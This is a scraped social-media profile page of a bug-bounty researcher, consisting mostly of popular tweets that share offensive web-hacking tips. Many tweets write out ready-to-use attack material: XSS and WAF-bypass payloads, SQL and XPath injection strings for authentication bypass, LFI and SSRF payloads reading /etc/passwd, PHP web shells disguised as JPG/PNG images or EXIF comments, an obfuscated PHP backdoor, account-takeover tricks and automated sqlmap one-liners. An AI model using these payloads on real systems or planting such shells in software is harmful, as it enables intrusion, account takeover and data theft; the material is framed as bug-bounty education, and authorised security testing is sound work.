Pikagi
Md Ismail Šojal Profile Banner
Md Ismail Šojal Profile
Md Ismail Šojal

@0x0SojalSec

22,446
Followers
4,309
Following
666
Media
24,381
Statuses

Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis / incident Response II Pwn || GH0ST_3xP10iT || 0ld Accounts Suspended @0xSojalSec ||

localhost
https://t.co/4hhumm8U71
Joined October 2021
Don't wanna be here? Send us removal request.
Pinned Tweet
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
> Wordpress juicy endpoints #bugbountytips #infosec
Tweet media one
53
336
1K
Last Seen Profiles
Mannu

@mannu_meha

ɐHı̣ɥS

@Siha_tag

牛島薫子(フジコの弟)

@Pro_Wresler

Lisa Clark Diller

@lisaclarkdiller

صافي

@msc3op1982

Chatsworth Baseball

@Worthbaseball

Close Watch Films

@close_watch

Snowflake_News

@Snowflake_News

松尾宗能[ムネヨシ]

@ParksRecords

Irene Otero-Muras

@Otero_Muras

STW .. Aku Cinta Kau 🥰

@pengen_stw

Haley Petersen 👑

@hpeteofficial

Canadian Warplane Heritage Museum

@CWHM

Henry Ramirez

@HRamirezBoxing

jenna🌹

@jennnnarose

COUNTRY OVER PARTY #DemCastNm

@travel5762

inductor / Kohei Ota

@_inductor_

Warss 🏳️‍🌈 🇧🇷

@renanwarss

Trans Rachel (BDG)

@Rachel_lynnP

Salman Naeem

@ShSalmanNaeem

ِ

@x_Mihawk

Rangana Herath

@HerathRSL

Hrs

@muntahanpikiran

First Tuesday Conservatives - Asheville

@AshevilleFirst

🌈frog🌈|ARI ERA

@fwoggymilk4

pecinta IBU2, STW, BINOR & JANDA

@stw_pdg

Adam Paloian

@adampaloian

elly jelly 🌱

@yuzuisacutie

GAT Eng Thailand

@GATEngThailand

雷音/ジョータロー

@MASTER_LION_

你的阿夔

@ni_kui24127

One Fresh Pillow

@OneFreshPillow

Jonas Young

@FutureAVC

lan

@necrostyro

鎌田裕也(yuya kamata)

@kama18kpbr

Trstnn

@ohTrstn

@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
8 months
The new search allows for regex, which means brand **new** regex GitHub Dorks are possible! Eg, find SSH and FTP passwords via connection strings with: /ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/ #infosec #cybersecurite #bugbountytip
Tweet media one
7
321
1K
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Top 15 - Vulnerability Scanners : 🥹⚙️ #infosecurity #Cybersecurite #bugbountytips
Tweet media one
27
294
936
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Sites Provide Free VPS : #infosecurity #cybersecurity #bugbountytips #automations
Tweet media one
29
283
891
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
A Chrome extension that keeps track of the injected urls with Blind XSS payloads. #infosec #cybersec #BugBounty #xss
Tweet media one
19
239
844
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
When you test a Django, Rails, or NodeJs web app try the following payloads in the "Accept:" header. 🥹 Payloads: ⚙️👇 #infosecurity #cybersecuritytips by @SpiderSec
Tweet media one
28
229
801
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
If you run a bruteforce and notice weird behaviours - like "/admin/" redirecting to / always investigate these. /admin/ /admin/../admin //admin/ /Admin/ /admin;/ /Admin;/ /index.php/admin/ /admin/js/*.js /admin/*brute*.ext /admin../admin //anything/admin/ #infosec
28
175
792
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
The best single #XSS vector you'll ever have! Payload : JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
32
185
673
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Huge vulnerable site List [LFI] #infosec #CyberSec #bugbountytips
Tweet media one
20
184
663
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
4 months
Active Directory Pentesting Lab Setup📦 - #infosec #cybersec #bugbountytip
Tweet card media
Active Directory Pentesting Lab Setup - Pentestguy

Learn how to setup your own active directory pentesting lab using vulnerable-AD, Lab includes child domain, clients, etc.

pentestguy.com
1
210
666
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Cloudflare, Sucuri, Incapsula real IP tracker :- #infosec #CyberSec #bugbountytips
Tweet media one
8
229
664
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
You can find deep domains without tools. like this simple dorks :🙃 site:*.site.com -www site:*.*.site.com -www site:*.*.*.site.com -www #infosec #bugbountytip #cybersecuritytips
9
173
644
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
8 months
50 Top Digital Forensics Tools Network Forensic Tools ⚔️ #infosec #cybersec #bugbountytips
Tweet media one
3
159
625
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Mindmaps for bug bounty Hunters, pentesters, and offensive/defensive security Professionals #infosec #cybersec #offensive #defensive
Tweet media one
30
216
602
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
1:- Use @fasthm00 2:- Import to burpsuite match and replace. 3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080 4:- The Blind xss payload will added automatically by burp and gospider. Finally:- 4 BLIND XSS REPORTS.
Tweet media one
29
236
592
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
WEB / BUG BOUNTY - APIs Resource API endpoints () - API Security part 1 () - 31 Tips for pentesting APIs () - 31 Tips (drive document) ()
Tweet card media
31 Days of API Security - PUBLIC

Sheet1 #,Category,Tweet,Sub Tweet,Total Retweets,Total Likes,Inon Likes,Inon Retweets,Traceable Likes,Traceable Retweets,https://twitter.com/InonShkedy 26,AuthZ,Trying to find BOLA (IDOR) in APIs,...

docs.google.com
23
257
585
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Cloudflare bypass : "-alert(0)-" : ❌ "-top['al\x65rt']('sailay')-" : ✅ #infosec #cybersec #bugbountytips
20
157
568
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
9 months
How I Escalated a Time-Based SQL Injection to RCE SQL to RCE : - #infosec #cybersec #bugbountytips
Tweet card media
How I Escalated a Time-Based SQL Injection to RCE

Good day everyone! I hope all of you are doing well.

infosecwriteups.com
3
183
541
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Default credentials 👇⚡️ #infosec #cybersec #bugbountytips
Tweet media one
5
187
531
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Log4j 2.16 vulnerability DoS 🫰 - Paylaod: ${${::-${::-$${::-j}}}} refer to: … #infosec #cybersecurite #bugbountytips
Tweet media one
8
167
531
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Top 20 essential tools for Bug-Bounty Hunting 🫰 #bugbountytips #cybersecurity #infosec
Tweet media one
11
146
517
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
6 months
All of OSCP Cheatsheets: 📓📓📓 - - - - - - - - - #infosec
Tweet card media
x89k

archived 16 Jan 2019 23:24:58 UTC

archive.is
6
189
526
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
YouTube Channels for cybersecurity Hacking and Bug Bounty ⚔️ #infosec #cybersecurity #Hacking #bugbountytips #CyberAttack
Tweet media one
24
169
496
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Awesome Web Security 💻💻 #infosec #bugbountytips #cybersecurity
Tweet media one
11
185
503
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
9 months
So many beginners ask what to do after finding Subdomains ⚔️ #infosec #cybersec #bugbountytips
Tweet media one
6
151
506
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Exploits & Tools Search Engine⚔️⚙️ #infosec #CyberSecurity #bugbountytips
Tweet media one
10
187
499
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
7 months
SQL Injection Cheatsheet Auth Bypass Payloads : ⚔️ #infosec #cybersec #bugbountytips
Tweet media one
2
131
494
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
You can serve a #XSS payload from a XML file <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html=""> <html:script>prompt(document.domain);</html:script> </html> #infosec #bugbountytips #bugbounty #owasp #Xss
Tweet media one
13
150
484
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
If you are tired of googling for #BugBounty writeups, I made a little tool that lets you search writeups easily. You can also pull the search data in JSON format if you need it.⚙️⚔️ #cybersecurity #bugbountytips #infosec #offensivesec
17
131
481
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Nmap – Techniques for Avoiding Firewalls⚡️🛡️ #infosec #cybersec #bugbountytips
Tweet media one
15
145
477
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Time-based SQLi with two payloads injected in the following headers: 1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR" 2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z #sqli #cybersecuritytips #infosecurity #bugbountytip
15
157
464
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
403 bypass⚔️ #infosec #bugbounty #403bypass
Tweet media one
10
137
460
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes. This will help to bypass WAF and execute PHP reverse shell for RCE. get more detail about this👇. #bugbountyTips #bugbounty .
Tweet media one
13
130
467
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Bug Bounty Tip:- File upload to RCE⚔️🛡️ #infosec #bugbountytips #rec #CyberSec
Tweet media one
10
136
460
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Testing SQLI in Api's? Always start From : Boolean based >> Time based {"id":"56456"} - OK {"id":"56456 AND 1=1#"} -> OK {"id":"56456 AND 1=2#"} -> OK {"id":"56456 AND 1=3#"} -> ERROR {"id":"56456 AND sleep(15)#"} -> SLEEP 15 SEC #sqli #infosec #cybersecurity #bugbountytips
9
119
446
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Admin-Panal Bypass⚔️ XPath Injection ``` ‘ or ‘1’=’1 ‘ or ‘’=’ ‘ or 1]%00 ‘ or /* or ‘ ‘ or “a” or ‘ ‘ or 1 or ‘ ‘ or true() or ‘ ‘or string-length(name(.))<10 or’ ‘or contains(name,’adm’) or’ ‘or contains(.,’adm’) or’ ‘or position()=2 or’ admin’ or ‘ admin’ or ‘1’=’2 ```
9
160
449
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
5 months
Command Injection - Filter Bypass: ⚔️ #infosec #cybersec #bugbountytip
Tweet media one
2
136
454
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Automated blind-xss search for Burp Suite : #xSs #blindxss #infosec #cybersec
Tweet media one
7
154
446
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Limiting the google search to only IP addresses bringing interesting results. @0x21SAFE made a web-based tool just for that, you can try it at or #infosec #cybersec #bugbountytips
Tweet media one
8
116
457
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
8 months
Authentication Bypass: ⚡️ #infosec #cybersec #bugbountytips
Tweet media one
1
110
445
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Nginx Path Traversal : #cybersec #infosecurity #bugbountytips
Tweet media one
19
137
445
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
9 months
SQL Injection in Email Address (username) - by @dimazarno Tips: "injection_here"[at]email[dot]com Bypassing Email Filter which leads to SQL Injection: - #infosec #CyberSecurity #bugbountytips
Tweet media one
Tweet media two
Tweet media three
3
134
433
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Test Cache Poisoning : ⚔️⚡️ #bugbountytips #cybersecuritytips #infosec
Tweet media one
7
142
430
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
testing 403 bypass..? You found a /wp-admin with 403 status. *) Bypass it using /wp-admin/setup-config.php?step=1 This will allow you to create a database. From here, you can escalate it to any other big vulnerability : #infosec #bugbountytips #cybersec
5
122
419
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Swagger UI LFI Injection by @cycatz LFI Payload: /v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd HTTP/1.1 #bugbounty #bugbountytips #LFI
11
124
426
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
WAF bypass payload and detailed explanation by @s0md3v <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1// #bugbountytips #cybersecurity #infosec
Tweet media one
31
140
423
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Yet another Account Takeover technique. Seperator: email=victim @mail .com,hacker @mail .com email=victim @mail .com%20hacker @mail .com email=victim @mail .com|hacker @mail .com Array: {"email":["victim @mail .com","hacker @mail .com"]} #infosec #bugbountytips #cybersec
15
123
422
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Bypassing most FILE Uploads filters by @0xsapra * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #infosec
17
122
419
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
try testing for SQLi Authentication Bypass :⚔️ #infosec #bugbountytips #cybersecuritytips
Tweet media one
9
126
413
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Small tool to Grab subdomains using Shodan api. . #infosec #bugbountytips #cybersecuritytips
Tweet media one
2
124
412
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
You can find deep domains without tools like this simple dorks: ⚡️ site:*.site.com -www site:*.*.site.com -www site:*.*.*.site.com -www #infosec #cybersec #bugbounty
14
108
410
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
WAF always deletes your backdoor? try this to bypass it: <?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]); #infosec #bugbountytips #cybersecuritytips
Tweet media one
18
145
396
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Account Takeover of every user 1) go to forgot password 2) capture Request in a burp 3) change refrer link into my burp collaborator link 4) got http request with Password reset token link of a victim #infosecurity #bugbountytips #CyberSec
12
94
399
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Search in github repo for creds/apikey/secrets using nuclei template CMD : "git clone | nuclei -target ./ -t ~/Desktop/secrets-in-files.yaml" #infosec #bugbountytips #CyberSecurity
Tweet media one
17
127
394
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
how to use encodings in <a>. what symbols in which points you can inject to bypass WAF, filters, sanitizers. ⚔️ #infosec #CyberSecurity #bugbountytips
Tweet media one
3
139
387
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
8 months
Again Best Checklist IDOR: ⚡️ #infosec #cybersec #bugbountytips
Tweet media one
1
105
386
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
This OneLiner extracts all API endpoints from AngularJS & Angular javascript files.⚡️ curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u #infosec #cybersec #bugbountytips
Tweet media one
8
128
378
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
MySQL Blind (Time Based) Payload list: #bugbountytips #infosec #cybersecuritytips #sqli
Tweet media one
10
128
384
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
3 months
Subdomain finders⚔️ - - - - - - - - - #infosec #cybersec #OSINT
Tweet card media
DNS Spy: Paranoid about your DNS. Monitor & back-up your DNS, get alerts when your DNS changes.

DNS Spy: Paranoid about your DNS. Monitor & back-up your DNS, get alerts when your DNS changes.

dnsspy.io
1
139
373
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Recon Methods:- Part 1:- Part 2:- Part 3:- Part 4:- Part 5:- #bugbountytips #infosecurity #cybersecurity
12
150
375
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Google Dorks CLI For Subdomain Enumeration. 🤠 #Feature : Bypassed Page Filter :) #infosec #cybersecurity #bugbountytip
Tweet media one
7
113
372
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Blind SqLI Tips : X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR' #bugbountytips #infosec #CyberSec
13
95
364
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
CRlF Injection attack payloads : #bugbountytips #infosecurity #cybersecurity #CRLF
Tweet media one
13
137
358
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
File upload WAF bypass : by @0xJin /?file=shell.php <-- Blocked /?file===shell.php <-- Bypassed #infosec #bugbounty #bugbountytips
8
94
356
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
List Of bug bounty/Crowdsourced security platforms : #bugbounty #offensivesec #infosec
Tweet media one
9
120
349
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
5 months
403 Bypass list by @jhaddix Url Manipulation Methods Top 77 ways to bypass access control ⚔️ #infosec #cybersec #bugbountytip
Tweet media one
2
110
357
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
5 months
Penetration testing tools 📔 by : Cybersecurity insights
Tweet media one
1
76
352
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
SQL injection Oneliner: $ subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "\?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt Always remember, oneliners don’t replace manual hunting.🔥 #sqli #infosec #bugbounty
11
121
353
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Burp Suite Secret Finder - Burp Suite Extension To Discover Apikeys/Tokens From HTTP Response⚡️ > #bugbounty #cybersec #bugbountytips
Tweet media one
15
100
348
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
How to find authentication bypass vulnerabilities. Focus. I Added headers. by @jae_hak99 Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found #bugbounty
9
111
347
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Find SSRF on all your huge target list via httpx:- 1:- Download 2:- Add on {target} 3:- Run httpx. httpx -paths ssrf-parameters.txt -threads 200 -o ssrf.txt 4:- Screenshot the result gowitness file -f ssrf.txt #infosec
Tweet media one
13
126
339
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization #infosec #XSS #cybersec #bugbountytips
Tweet media one
1
112
345
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
13 days
SQL Injection in QR Code ⚔️⚔️⚔️ qr' OR 1=1 -- - qr' OR 1=1 -- # qr' OR '1'='1 qr' OR '1'='1'-- Credit by @angryovalegg #infosec #cybersec #bugbountytips
Tweet card media
QR CODE SQL Injection

Greetings, fellow cybersecurity enthusiasts! My name is Roninja, hailing from the vibrant state of Uttar Pradesh, India. At the age of 22…

medium.com
8
106
362
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
#SSRF Payloads for LFR/LFD file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ SSRF POLYGLOT file:///etc/passwd?/../passwd #infosec
Tweet card media
On SSRF (Server Side Request Forgery) or Simple Stuff Rodolfo Found — Part I

I think the most we have to test against an application the better. But as you can see by yourself (correct me if I’m wrong please) the…

rodoassis.medium.com
5
129
345
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
#oneliner ✅ Subdomain enumeration ✅ Full port scan ✅ HTTP web server detection #security #bugbountytips #portscan #subdomain #chaos
Tweet media one
9
85
340
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Cloudflare #XSS WAF Bypass. Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F #bugbountytips #cybersecurity #infosec #xss
22
132
332
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload. echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png #bugbounty #infosecurity #cybersec
9
107
322
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Easy short Xss Tips ⚔️ 1.⚙️Subdomain enumeration 2.⚙️S3 bucket with access denied 3.⚙️Ffuf found -> /cdn/ 4.⚙️Ffuf found -> /cdn/proxy.html 5.⚙️blank page -> view source, found url param (document.location) 6.⚙️?url=javascript:alert () XSS popped up ⚙️ #infosec #cybersec
7
80
327
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
I just found an unbelievable number of unauthorized API endpoints using this 1 liner. katana -u $url -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn |subjs | python3 /opt/JSA/jsa.py |goverview probe -N -c 500 |sort -u -t';' -k2,14 |cut -d ';' -f1 #infosec
17
81
329
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Bug-Bounty-Dorks #bugbountytips #infosec #cybersecurity
Tweet media one
19
114
315
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Don’t report SSRF, Escalate to RCE #bugbounty #bugbountytips #bugbountytip
Tweet card media
Bug bounty write-up: From SSRF to $4000 - thehackerish

Welcome to this bug bounty write-up where I show you how I escalated a Server-Side Request Forgery vulnerability (SSRF) to a Remote Code Execution (RCE).

thehackerish.com
5
127
324
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
7 months
Subdomain Takeover oneliner ⚔️ #infosec #cybersec #bugbountytips
Tweet media one
1
88
318
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
8 months
OSCP Cheatsheet 📓 This cheatsheet as part of OSCP preperation.) - #infosec #pentesting #redteam #cybersecurity
Tweet media one
6
126
315
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
SQL Injection Auth Bypass : #infosec #cybersec #sqli #bugbountytip
Tweet media one
6
82
316
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Malicious File Upload:🫰 Read For More: #cybersecurity #bugbountytips #bugbounty #infosec
Tweet media one
16
115
315
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
LFI - RCE #LFI `..\..\..\..\..\..\..\..\etc/passwd` #Exploitation 1. Log injection -> <?php system($_GET['cmd']); ?> #Code injection 2. LFI ..\logs\log.txt This include(..\logs\log.txt) -> Execute the PHP code -> Code injection. RCE🤏
14
95
312
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Add to your list #SQL #injection payload By @lu3ky13 1%27/**/%256fR/**/50%2521%253D22%253B%2523 == "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z", === query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login == ' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
9
103
314
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Did you know the shortest #payload to achieve code execution in #PHP is only 15 bytes long ? If you can inject it in a page on the site you will achieve remote code execution! This is really useful in #BugBounty or #pentest when you have a limited input size. thread👇
Tweet media one
9
85
313
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
5 months
RCE vulnerability checklist 📔 #infosec #bugbountytips #cybersec
Tweet media one
Tweet media two
5
107
319
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
E-mail address payloads📓 The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems. 1/.XSS (Cross-Site Scripting): test+(<script>alert(0)</script>) @example .com test @example (<script>alert(0)</script>).com "
17
124
313
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
WAF Bypass During Exploitation Of File upload Fire /?file=shell.php <-- Blocked /?file=shell.php.jpg <-- Blocked /?file=shell.php5 <-- Blocked /?file===shell.php <-- Bypassed 200 OK #infosecurity #bugbountytips #security #waf #bypass
6
78
311
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
7 months
S3 Bucket Recon Method ⚔️ #infosec #cybersec #bugbountytips
Tweet media one
3
98
310
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
6 months
Captcha Bypass⚔️⚔️⚔️ #infosec #cybersec #bugbountytips
Tweet media one
2
91
300
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
11 months
List of GitHub Dorks for bug bounties . like Finding target Files, Languages , API Keys, Tokens,Usernames,Passwords,Information using Dates,Extension 📓 #infosec #cybersec #bugbountytips
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
102
294
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
8 months
403 Forbidden bypass 🫰 GET /admin = 403 Forbidden GET /random-dir/../admin = 200 OK Cloudflare IP Restriction bypass 🫰 GET /admin = Error 1006 (Cloudflare) GET /admin? = 200 OK #infosec #cybersec #bugbountytips
1
54
293
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Bug Bounty mind maps collection:-📓 ⚡️ - - - - - #infosec #cybersec #bugbountytips
Tweet media one
Tweet media two
8
124
290
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Bypass File Upload Filtering : In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #infosec #cybersecuritytips
3
102
290
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
1 year
Find hidden params in javascript files assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
Tweet media one
9
86
290
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
extremely useful when pentesting APIs. by @CristiVlad25
Tweet media one
7
99
290
@0x0SojalSec
Md Ismail Šojal
@0x0SojalSec
2 years
Here's a small #XSS list for manual testing (main cases, high success rate). "><img src onerror=alert(1)> "autofocus onfocus=alert(1)// </script><script>alert(1)</script> '-alert(1)-' \'-alert(1)// javascript:alert(1) Try it on: - URL query, fragment & path; - all input fields.
14
88
289